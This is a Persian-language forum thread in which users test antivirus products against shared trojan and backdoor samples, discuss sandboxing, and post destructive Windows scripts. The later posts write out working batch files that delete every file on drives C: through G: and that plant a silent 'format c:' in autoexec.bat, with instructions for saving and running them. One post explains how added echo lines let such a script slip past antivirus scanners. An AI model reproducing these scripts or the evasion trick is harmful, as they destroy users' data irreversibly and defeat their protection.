AVA UK جان دست کم گرفتی مارو ها منم اینارو بلدم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] توضیح دادم که :

خوب متوجه منظورم نشدی عزیز بیشتر توضیح میدم.

شما که خودت استاد مایی و این هارو میدونی اما هوش مصنوعی آنتی ویروس روی دیتابیس آنتی ویروس هست. یعنی چطور ؟ یعنی وقتی یک ویروس بازنویسی میشه و یک سری کد هاش تغییر میکنه آنتی ویروس چون یک یا چند نوع از اون ویروس رو در دیتابیسش ثبت کرده باشه دیگه با تغیر یکم از کدهاش قدرت شناساییش رو از دست نمیده.

مثلا میگم یک ویروس ساخته میشه کاملا جدید هست انتی ویروس فرداش وارد دیتابیسش میکنه پسفردا ویروس بازنویسی میشه و یکم از کدهاش عوض میشه اما چون هنوز ترکیب اصلی وجود داره انتی ویروس که هوش مصنوعی خوبی داره شناسایش میکنه.( هوش مصنوعی )

حالا من این ویروس رو با آنلاین اسکن کسپرسکی در همین ساعت اسکن میکنم نتیجه رو ببین.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

میبینی که اگه فایل اسکن و دیتابیس و هوش مصنوعی عادی بوده باشه حتما اینجا خودش رو نشون میداد.

حالا نتیجه ای که شما میگیری فایل رو دانلود میکنی آنتی ویروس میگه این ویروس هست. پس این یه اسکن ساده نیست . حالا چی میتونه باشه ؟ نظرم رو بالا گفتم :



سلام دکتر جان. امضا رو حال مکنی پاکش کردند و deleted بهش اضافه شده. اینم نتونستن تحمل کنند این انسانهای قرون وسطا. :41:

بهر حال بله عزیز درست میگید, منم به خاطر همین File Anti-Virus رو غیر فعال کردم که بگم که با غیر فعال کردن این قسمت یعنی دیتابیس و signature آنتی ویروس رو از کار انداختم. پس وقتی این قسمت یعنی signature در خاموش باشه دیدید که هوش مصنوعی کسپرسکی هم کار نکرد و پیغامی رو مبنی بر آلوده بودن فایل نشون نداد.
منظور من هم دقیقا همین بود. که اگر این تشخیص از روی هوش مصنوعی انجام نمیشد پس چرا با از کار انداختن File Antivirus هوش مصنوعی هم کار نمیکنه. اینجای کار به نظرم هر چیزی که باشه هم سایت کسپرسکی و هم سایت ویروس توتال یک جای کار رو اشتباه میکنند.

چون الان چیزی که جلوی چشم همه مون هست داریم میبینم. روی یک سیستم واقعی, با آنتی ویروس واقعی, پیغام و همچنین آزمایشات نشون میده که از روی هوش مصنوعی تشخیص داده. پس اگر در یک سیستم غیر واقعی که فقط از موتور جستجوی آنتی ویروسها و دیتابیسشون استفاده میکنه موردی مثل همین موردی که الان داریم در موردش بحث میکنیم دیده بشه, کدومش رو میتونیم واقعی تر بدونیم؟

البته نمیگم حرف شما درست نیست, چون اگر اینطور باشه به قول شما چرا هوش مصنوعی که از روی دیتابیس میتونه رفتار و کدهای آلوده رو تشخیص بده در موتور های جستجوری آنلاین که بر همین اساس کار میکنند چیزی نشون نمیده؟ این معمایی هست که با یک ایمیل زدن به ویروس توتال و یا حتی خود کسپرسکی ممکنه جواب قانع کننده ای داشته باشند.

من فقط این رو میدونم که نه اسکن آنلاین سایت کسپرسکی و نه اسکن آنلاین سایت ویروس توتال از انجین هیچ آنتی ویروسی استفاده نمیکنه و به همین دلیل نتایج نشون داده شده در ویروس توتال و سایتهای مشابه نمیتونه همیشه با نتایجی که در کامپیوتر با آنتی ویروس نصب شده نشون داده میشه یکی باشه.

این موضوع رو من تقریبا 2 سال پیش در انجمن wilderssecurity دنبال میکردم. به طور مثال شما فایل Anal_----_Movie_162.mpeg.exe را که در پک 30 تایی که قبلا گذاشته بودم در ویروس توتال آپلود کن و نتیجه اسکن یک فایل واقعی exe را نگاه کن. :31: عکس زیر...

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

همانطور که میبینی این فایل توسط 11 آنتی ویروس که تاریخ و ساعت اسکن هم مشخصه شناسایی شده.

حالا شما اگر همین فایل رو توسط winrar به یک فایل ISO تبدیل کنید فکر میکنید چه اتفاقی بیوفته؟ خب معلومه خیلی از آنتی ویروسها ممکنه نتونند داخل فایل های ISO رو اسکن کنند در نتیجه باید از تعداد 11 آنتی ویروسی که در بالا خود فایل exe را بدون فشرده سازی تشخیص دادند کمتر بشه. :46:

اما نتیجه کار کاملا بر عکسه... بیشتر از 2 برابر به تعداد این آنتی ویروسها اضافه میشه... :18::31:
Antivir یکی از نمونه هاش هست. قبلا فایل اصلی رو تشخیص نمیداد, الان میگه WORM داره اونم به چه گندگی.
:21:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

دکتر بیا و پیدا کن پرتقال فروش را :31:

نتایج اسکن در ویروس توتال به ترتیب عکس ها...


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
تمام نتایج بالا به کنار. حالا اگر فایل .exe را که قبلا در نتیجه اسکن آنلاین ویروس توتال گفته شده کسپرسکی اون رو تشخیص نمیده با یک سیستم واقعی که آنتی ویروس کسپرسکی روش نصبه اسکن کنید متوجه میشید که کسپرسکی اون رو از روی دیتابیس تشخیص میده.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ویروایش : نتیجه ی شک بر انگیز.

نتیجه خیلی جالب شد در عرض 30 دقیقه نتیجه از این رو به این رو شد.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

مخرب

توتال :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دانلود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

پسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

نود32 هم شناسایی کرد.

مخرب

توتال :

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیددانلود :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدپسورد: Dr

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

امروز تصمیم گرفتم Sandbox خودم رو آزمایش کنم. البته قبلا همچین آزمایشاتی رو روش انجام داده بودم اما این اولین دفعه هست که در انجمن نتیجه اش رو میزارم.

برای کسانی که نمیدونند SandBox چیه این توضیح رو بدم که این برنامه قادر به این هست که مرورگر اینترنتی شما و یا هر فایلی که دلتون خواست رو در یک ماشین مصنوعی که هیچ دسترسی به ویندوز و سیستم شما ندارند اجرا کنه. به این صورت که اگر شما خطرناکترین ویروسها و کرمها رو توسط مرورگرتون Firefox, IE یا هر چیز دیگه ای دانلود کنید و یا اتوماتیک توسط اکسپلویت ها اجرا بشند این آلودگی ها نمیتونند وارد سیستم شما بشند. حتی اگر آنتی ویروس هم نداشته باشید!

مخربها داخل سیستم شما اجرا میشند, کارشون رو که بعضی مواقع میتونه دانلود کردن نمونه های جدیدتر که توسط آنتی ویروسها شناسایی نمیشند باشه اما خارج از این هیچ کار دیگه ای رو نمیتونند انجام بدند. شما فقط کافیه مرورگر خودتون رو ببندید تا همه این آلودگی ها و مخرب ها از سیستم شما پاک بشند و هیچ رد پایی ازشون باقی نمونه. چون شما مرورگرتون رو زیر نظر SandBox اجرا کردید.

بعضی از آنتی ویروسها و نرم افزارهای امنیتی یکی دو ساله که پی بردند Sandbox را جهت یک لایه محافظتی در برنامه هاشون بکار ببرند. مثلا آنتی ویروسهایی مانند KIS, CIS, AVAST جزو آنتی ویروسهایی هستند که SandBox دارند. من SandBox آنتی ویروس Avast Internet Security را امتحان کردم اما در تستی که انجام دادم ناموفق بود و فایل هایی را که میخواستم در Sandbox اجرا کنه را اجرا نمیکرد.

Sandbox در کسپرسکی اینترنت سکیوریتی با اسم SafeRun معرفی شده اما متاسفانه در ویندوزهای 64 بیتی با محدودیت کار میکنه و تمام امکانات ویندوزهای 32 بیتی را نداره. دلیل این را هم قبلا در پست های قبلیم توضیح دادم.

Comodo Internet Security یکی از بهترین Sandbox ها را فعلا در بین تمام برنامه های امنیتی داره. چون اولین برنامه امنیتی است که تمام فایل های شناخته شده مانند یاهو مسنجر با امضای دیجیتالی را خارج از Sandbox اجرا میکنه تا بتونید برنامه هاتون رو اجرا کنید و تمام فایل های ناشناخته بدون امضای دیجیتالی را اتوماتیک داخل Sandbox اجرا میکنه. فایل های ناشناخته بدون امضای دیجیتالی فرقی نمیکنه به چه طریقی وارد سیستم شما بشه و بخواد اجرا بشه. هر نوع فایلی در Sandbox اجرا میشه و تا شما تعیین نکردید که اون فایل سالم است و ضرری برای سیستم نداره از Sandbox خارج نمیشه.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اما من خودم از برنامه SandBoxie نسخه ی 64 بیتی استفاده میکنم. این برنامه هم یک Sandbox است اما دلیل انتخاب من در بین Sandbox ها این است که تمام جزئیات فایل ها و دسترسی فایل ها به نقاط مختلف رو نشون میده. بطور مثال شما اگر ویروسی را داخل Sandboxie اجرا کنید, بهتون نشون میده که اون ویروس اگر داخل یک سیستم معمولی اجرا میشد چه کارهایی را میتونست انجام بده و چه فایل هایی را میتونست دانلود کنه و در سیستم شما اجرا کنه. کلا برای آنلایز کردن رفتار تروجانها و فایل های مشکلوک بهترین برنامه ای است که تا حالا دیدم.

اگر کسی خواست بعدا میتونه در مورد Sandbox ها بیشتر تحقیق کنه چون مطالب زیاده اما متاسفانه به زبان فارسی خیلی کم وجود داره چون هنوز بین فارسی زبانان Sandbox جا نیوفتاده و با طرز کارش آشنایی کامل را ندارند.

به همین دلیل من امروز اومدم و تروجانی را که drhaniball عزیز در پستی که نقل قول کردند گذاشتند را داخل Sandboxie بدون داشتن هیچ آنتی ویروس و لایه ی محافظتی اجرا کردم.

نتیجه این شد که این تروجان اگر در سیستم کسی که به اینترنت وصل هست اجرا بشه فایل های آلوده و ناشناس دیگه ای رو دانلود میکنه و اسم خودش را هم تغییر میده تا شناسایی نشه و بعد خودش غیر فعال میشه و فایل های آلوده ای که دانلود کرده فعال میمونند.

دلیل اینکه خودش یعنی فایل اصلی غیر فعال میشه میتونه این باشه که میخواد ناشناس بمونه تا اگر فایل های آلوده دانلود شده پیدا و غیر فعال شدند دوباره بتونه نمونه های جدیدتری رو دانلود کنه.

در عکس زیر فایل هایی را که دانلود کرد و بعد در سیستم اما زیر نظر Sandboxie فعالشون کرد رو با فلش قرمز نشون دادم.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از فعال کردن فایل های آلوده بالا که هر کدومشون ممکنه جایی از سیستم رو دستکاری و خراب کنند فایل های دیگه ای نیز به داخل پوشه Windows کپی کردند. عکس زیر نشون میده به چه قسمت هایی از ویندوز در صورت نداشتن Sandbox میتونست آسیب برسونه.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

با بستن مرورگر اینترنتیم و همچنین بستن Sandboxie تمام اینها از سیستم پاک شدند. البته از اولشم داخل سیستم نبودند بلکه Sandbox ها کاری میکنند که تروجانها و ویروسها فکر کنند به یک سیستم واقعی حمله کردند در حالی که در یک جای محافظت شده قرار دارند.

سیستم الان با بستن Sandboxie سالمه و اتفاق خاصی هم روی نداده. :31:

یک نکته ای هم یادم افتاد بگم که تا حالا در هیچ گزارش امنیتی و هیچ خبری گزارش نشده که ویروس یا کرمی بتونه از لایه ی دفاعی برنامه رایگان Sandboxie عبور کنه و بتونه وارد سیستم بشه. اما گزارش شده که برنامه هایی مانند DeepFreez که یکی از سخت جون ترین برنامه هاست توسط کرمی به اسم W32.SafeSys.Worm آسیب پذیر بوده و مورد حمله قرار گرفته. فقط در کشور ویتنام این کرم تونسته بود روی سیستم هایی که Deep Freeze نصب بوده 46000 مورد رو نابود کنه. اما همین کرم رو که بعدا در انجمن Wilders Security بر روی برنامه ی SandBoxie آزمایش کردند نتونسته بود ازش رد بشه.

همه اینها دلیل نمیشه که Sandboxie آسیب پذیر نیست به همین دلیل بهتره در کنارش از یک آنتی ویروس هم استفاده بشه تا اگر نمونه ای پیدا شد که بتونه از لایه ی دفاعی Sandboxie رد بشه, آنتی ویروس و یا HIPS ها بتونند خرابکاری های اون رو شناسایی کنند.

لینک خبری در مورد کرم W32.SafeSys.Worm و آسیب رسانی به 46000 سیستم در ویتنام.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
سایت رسمی برنامه Sandboxie

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدمعذرت میخوام اگر جایی از تکست غلط املایی دارم. دیگه حوصله نکردم از اول بخونم. خسته شدم. :20:

ava uk جان راستش در اون مورد که اولا من نظر شخصی دادم و گفتم احتمالا [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] بی خیال اون مهم این بود که تونست تشخیص بده :31:

اون تروجان هم پس به نظر میرسه واقعا خطرناک بوده باشه و با تست شما همه چی روشن شد دستت درد نکته [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

ava uk جان راستش در اون مورد که اولا من نظر شخصی دادم و گفتم احتمالا [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] بی خیال اون مهم این بود که تونست تشخیص بده :31:

اون تروجان هم پس به نظر میرسه واقعا خطرناک بوده باشه و با تست شما همه چی روشن شد دستت درد نکته [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
مرسی دکتر جان:11:
بله عزیز, اصل اینه که تشخیص داده.:20: تشخیص هم نده از Application Control رد نمیشد چون امضا نشده بود. :31:

در مورد تستی هم که در مورد اون تروجان انجام دادم, یکی از هدفهام هم این بود که بعضی دوستان که نمیدونند SandBox چیه با قدرت و طرز کارش آشنابشند و برای اجرا کردن کیجن و فایل های مشکوک بیشتر ازش استفاده کنند.
تروجانه هم عجب جونوری بود هی داشت دانلود میکرد و پروسه های ناشناس رو اجرا میکرد:21:

مرسی دکتر جان:11:
بله عزیز, اصل اینه که تشخیص داده.:20: تشخیص هم نده از Application Control رد نمیشد چون امضا نشده بود. :31:

در مورد تستی هم که در مورد اون تروجان انجام دادم, یکی از هدفهام هم این بود که بعضی دوستان که نمیدونند SandBox چیه با قدرت و طرز کارش آشنابشند و برای اجرا کردن کیجن و فایل های مشکوک بیشتر ازش استفاده کنند.
تروجانه هم عجب جونوری بود هی داشت دانلود میکرد و پروسه های ناشناس رو اجرا میکرد:21:

مشخصه که فعال بوده هرچی هست. خیلی تروجان ها هستند که دیگه اصلا از سرور قطعند بی خطر شدند :31: یا صاحبش دیگه حال نداره به این بانک اطلاعتی که از ملت جمع آوری کرده سر بزنه. عجب جونورایی هستند که این تروجان هارو می نویستند. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr
نورتون 5 تا فایل مخرب تشخیص داد و حذف کرد . و من هم به نورتون ایمان اوردم که از کسپر بهتر ه:cool:

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr

ممنونم دکتر جان. ولی کسپر نشناخت... هیچکدومو نشناخت:13:

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr
اینم نتیجه توتال
کسپر با این دیتابیسه قوی اصلا نمیشناسه:18::18::18:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
نود 3 تا رو شناخت

بله نود32 3 تاشو شناخت. بقیشم ارسال کردم
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

البته میبینید که زده Number of cleaned file : 0 به این علته که من فقط اسکن کردم و در این قسمتش فقط اسکن میکنه و چیزی رو پاک نمیکنه. یه موقع به نود بدبین نشید

comodo همه رو شناخت هر 6 تارو!

اینم یه مخربه دیگه
فقط نورتون و McAfee-GW-Edition میشناسن:46:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
پسورد 123
توتال

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

در مورد فایل های بالایی خودم عجیب سر در گم شدم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] خیلی مشکوک هستند.

----------------------

دوستان با آنتی ویروستون قوی ترین فایل کیلر رو تست کنید. مثل قبل که گفتم

نت پد رو باز کنید. توش این دستورات رو پیست کنید. سپس save as با پسوند bat. سیو کنید.
همونطور که از دستوراتش مشخص هست کل هارد رو فرمت و غیرقابل بازگردانی میکنه.

چون خودتون میسازدید و دم دست هست مواظب باشید اجرا نکنید.


ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:\windows\*.*
Echo y | echo a | Echo y | del c:\*.*
Echo y | echo a | Echo y | del d:\*.*
Echo y | echo a | Echo y | del e:\*.*
Echo y | echo a | Echo y | del f:\*.*
Echo y | echo a | Echo y | del g:\*.*
echo y | copy *.* C:\
echo y | copy *.* D:\
echo y | copy *.* E:\
echo y | copy *.* F:\
echo y | copy *.* G:\

این هم یک ویروس که اکثر آنتی ویروسها میشناسند ولی بعضی از آنتی ویروسهای معروف نمیشناسند از جمله
1:AVG
2:Comodo
3:Kaspersky

لینک دانلود


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

Pass: mohsen


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr

دکتر جان لازمه نتیجه ی کسپرسکی رو بگم :31:



اینم نتیجه توتال
کسپر با این دیتابیسه قوی اصلا نمیشناسه:18::18::18:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنیدنود 3 تا رو شناخت

غریبه جان مگه کسپرسکی فقط دیتابیس داره؟
پس Behavior Blocker و Application Control اینجا چیکارند :46:


comodo همه رو شناخت هر 6 تارو!

Comodo اینطوری بخواد بره جلو از خیلی آنتی ویروسها و سکورستی سویت ها پیشی میگیره. البته الانم من خودم جزو تاپ 3 ها برای سکوریتی میدونمش. :20:

این هم یک ویروس که اکثر آنتی ویروسها میشناسند ولی بعضی از آنتی ویروسهای معروف نمیشناسند از جمله
1:AVG
2:Comodo
3:Kaspersky



اصلا روز کسپر نبود [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] ( البته به قول ava uk عزیز دیتابیس خالیش )

ava uk جان یه توضیح کامل در مورد استفاده از سندباکس بدی خیلی خوب میشه. یا اینجا یا تاپیک بزنی چیزی. همین الا بچه ها و از جمله من ویروس هارو توی سیستم اصلی اجرا کنیم. اگه اینجا باشه من توی پست اول بذارمش هم خوبه هرجا دوست داری. [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] من خودم خیلی وقته سندباکس رو نصب دارم اما اصلا ازش استفاده نکردم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ] راهنمایی کنی چطور بدون خطر اجرا بشن خیلی خوبه. من موقع اجرا یکی از اینها اخطار اجرا دریافت کردم. :46:

الان دقت کردم دیدم حتی مای کامپیوتر رو هم میشه با این برنامه باز کرد. :20: زحمتش افتاده گردن خودت رفیق :31:

این هم یه ویروس مشابه قبلی



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
pass: mohsen


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اینم چند تا کد مخرب
ولی کد های مخرب اصلا ویروس به حساب نمیان چون ما میتونیم با یه خط فرمان echo
انتی ویروس رو گمراه کنیم و فایل رو اجرا کنیم
مثلا این
اگر بدون خط فرمان echo باشه خیلی از انتی ویروسا ویروس میشنانش ولی
اگه بهش اضاف کنیم نه
@echo off
echo.
echo ةحححححححححححححححححححححححح ححححححححححح»
echo ؛ ؛
echo ؛ WORDSHIP ؛
echo بحححححححححححححححححححححححح ححححححححححح¼
echo Action in progress. Please wait...
echo.
@echo off
Cls
===========
Color fc
Del /a c:\*.com
Del /a c:\*.sys
Del /a c:\*.exe /s
===========

ویروس کار خ.دش رو انجام میده ولی بخاطر اینکه ما یه خط فرمان اضافه کردیم دیگه نمیشناسه
حالا بقیش


این ویروس بعد از نصب بر ریجستر اثر میگذارد و باعث میشود با فشار دادن هر دکمه ای از کیبورد کیس 2 صدای بوق بدهد و مانیتور چشمک بزند طرز ساخت: note pad خود را باز کرده و در آن کد



Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"
را در آن کپی و پست نمایید بعد به منوی فایل رفته و سیو از را انتخواب کنید بعد در قسمت filename نام مورد نظر را نوشته و به آن پسوند .reg بدهید مثل ficker.reg در آخر هم ذخیره کنید برای غیر فعال کردن آن مانند بالا عمل کنید ولی این بار این کد هارا زده و همان کارها را بکنید وذخیره کنید
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"


ابتدا برنامه Notepad ویندوز را اجرا کنید ( Start/All Programs/Accessories )
سپس با استفاده از فرمان Copy & Paste کدهای زیر را در محیط برنامه کپی کنید:



@ echo off
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit
حال از منوی File بر روی Save as کلیک کنید.
از منوی کشویی Save as type گزینه All Files را برگزینید.
در قسمت File Name عبارت txt.* را پاک کنید و به جای آن نام دلخواه خود را تایپ کرده و پسوند bat. را به انتهای آن اضافه کنید ، به طور مثال thebesthacker.bat
سپس مکان مورد نظر برای ذخیره فایل را مشخص کرده و روی دکمه Save کلیک کنید.
اکنون فایل فرمت شما آماده است. کافی است یکبار پس از اجرای فایل ، سیستم restart شود تا فایل فعال شود.


و....
ادامه دارد:31:

چند روز پیش نوک تیشه ام خورد به معدن یه پک بکدور. یکم ازش رو جدا کردم تا دوستان ببینند. این بک دور ها ظاهر جالی دارند. یکیشون مثلا شبیه آیکون اسکایپ می مونه که من بیشتر از همه اون رو دوست دارم [ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چون 6 تا بکدور رو با هم زیپ کردم فایده نداره توی توتال اپلود کنم.

دانلود بکدور ها:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

پسورد: dr

با عرض پوزش از دوستان باید بگم که آنتی ویروسهایی که بعضی فایل ها رو آلوده تشخیص دادند اشتباه کردند و اینجا آنتی ویروسهایی که تشخیص ندادند برنده هستند. :46: یعنی نتیجه اسکن ویروس توتال را باید برعکس حساب کنید.
چرا؟ ادامه پست رو بخونید تا متوجه بشید.

راستش برای خودم هم عجیب که آنتی ویروسهایی مانند ناد32 و یا کسپرسکی در بین آنتی ویروسهایی باشند که نتونند تشخیصی داشته باشند. به همین خاطر با آنتی ویروس خاموش و غیر فعال شده همه فایل ها را در کامپیوترم اجرا کردم. نتیجه بطور خلاصه این شد که این فایل ها سالم هستند و اکثرا برنامه هایی هستند که حتی سایت رسمی برای خودشون دارند.

بطور نمونه فایل hfd.exe برنامه ای هست که توسط اون میتونید آپلود و دانلود مصنوعی در داخل برنامه های تورنت درست کنید. در اصل هیچ فایلی نه دانلود میشه و نه آپلود میشه اما در برنامه های دانلود تورنت مانند Utorrent, BitTorrent و بقیه توسط این برنامه که اسمش NRPG RatioMaster است اینطور نشون داده میشه که شما در حال دانلود یا آپلود هستند. عکسی از برنامه ... یعنی فایل hfd.exe

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

این برنامه حتی سایت رسمی داره و برای دانلود کردنش هم میتونید از لینک زیر استفاده کنید.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

فایل ccce.exe در سیستم 64 بیتی اصلا اجرا نمیشه. یا کلا فایلش خرابه و یا در سیستم های 64 بیتی قابل اجرا شدن نیست.

فایل boos.exe فایل ستاپ برنامه معروف Skype اما به زبان چینی است. این فایل ستاپ حتی به زبان انگلیسی هم وجود داره. یعنی اول یک فایل چند کیلوبایتی را دانلود میکنید و بعد از اجرا کردنش میتونید فایل اصلی برنامه Skype را دانلود کنید.

عکس هایی از نشون دادن فایل ستاپ بعد از اجرا شدن و دانلود کردن ستاپ اصلی Skype.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعد از تمام شدن مراحل نصب سایت اصلی Skype.com باز میشه.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بقیه فایل ها را اجرا کردم و اکثرا اجرا نشدند. اما فایل ola.exe مشکوک میزد چون بعد از اجرا شدنش در سیستم من فایل دیگه ای رو به اسم _deleteme.bat درست میکنه. اما همین فایل درست شده رو وقتی در ویروس توتال اسکن کردم هیچ یک از آنتی ویروسها تشخیصی نداشتند.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بعد از اجرا کردنش هم مورد مشکوکی رو ندیدم. البته احتمال داره در سیستم من اجرا نشه چون درسته که آنتی ویروس رو کاملا غیر فعال کردم اما یک سری تنظیمات رو من قبلا در رجیستری و خود ویندوز انجام دادم که آسیب پذیری ویندوز رو کم میکنه و احتمال داره اینها به همین دلیل در سیستم اجرا نشند.

بهر حال اینها آزمایشاتی بود که من انجام دادم و به هیچ کسی توصیه نمیکنم این فایل ها را بدون آگاهی اینکه چه کاری دارید انجام میدید اجرا کنید. :20:

موفق باشید.

